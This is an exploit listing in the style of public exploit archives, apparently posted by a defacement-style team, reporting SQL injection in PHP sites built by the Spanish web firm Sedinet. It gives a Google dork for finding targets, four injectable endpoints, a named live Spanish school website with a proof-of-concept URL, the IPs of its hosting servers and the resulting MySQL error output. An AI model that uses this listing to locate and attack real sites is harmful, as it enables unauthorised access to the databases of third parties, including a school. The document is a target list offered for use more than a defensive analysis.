#################################################################### # Exploit Title : Sedinet Web Design Spain SQL Injection # Author [ Discovered By ] : KingSkrupellos # Team : Cyberizm Digital Security Army # Date : 15/01/2019 # Vendor Homepage : sedinet.com # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium # Google Dorks : intext:''Diseño, desarrollo y mantenimiento: Sedinet" # Vulnerability Type : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ] #################################################################### # SQL Injection Exploit : *********************** /evento_auxiliar.php?id=[SQL Injection] /noticia_auxiliar.php?id=[SQL Injection] /encuentro_auxiliar.php?id=[SQL Injection] /revistas_auxiliar.php?id=[SQL Injection] #################################################################### # Example Vulnerable Site : ************************* [+] colegiogloriafuertes.es/noticia_auxiliar.php?id=263%27 => [ Proof of Concept ] => archive.is/ucLql Note : (46.16.61.114) => There are 46,393 domains hosted on this server. Note : (46.16.59.53) => There are 43 domains hosted on this server. #################################################################### # SQL Database Error : ********************** Warning: mysql_result() expects parameter 1 to be resource, boolean given in /usr/home /colegiogloriafuertes.es/web/evento_auxiliar.php on line 238 Warning: mysql_result() expects parameter 1 to be resource, boolean given in /usr/home/colegiogloriafuertes.es /web/evento_auxiliar.php on line 238 Warning: mysql_result() expects parameter 1 to be resource, boolean given in /usr/home /colegiogloriafuertes.es/web/evento_auxiliar.php on line 229 Warning: mysql_result() expects parameter 1 to be resource, boolean given in /usr/home/colegiogloriafuertes.es/web/evento_auxiliar.php on line 230 0000-00-00 Warning: mysql_result() expects parameter 1 to be resource, boolean given in /usr/home/colegiogloriafuertes.es/web/evento_auxiliar.php on line 236 #################################################################### # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team ####################################################################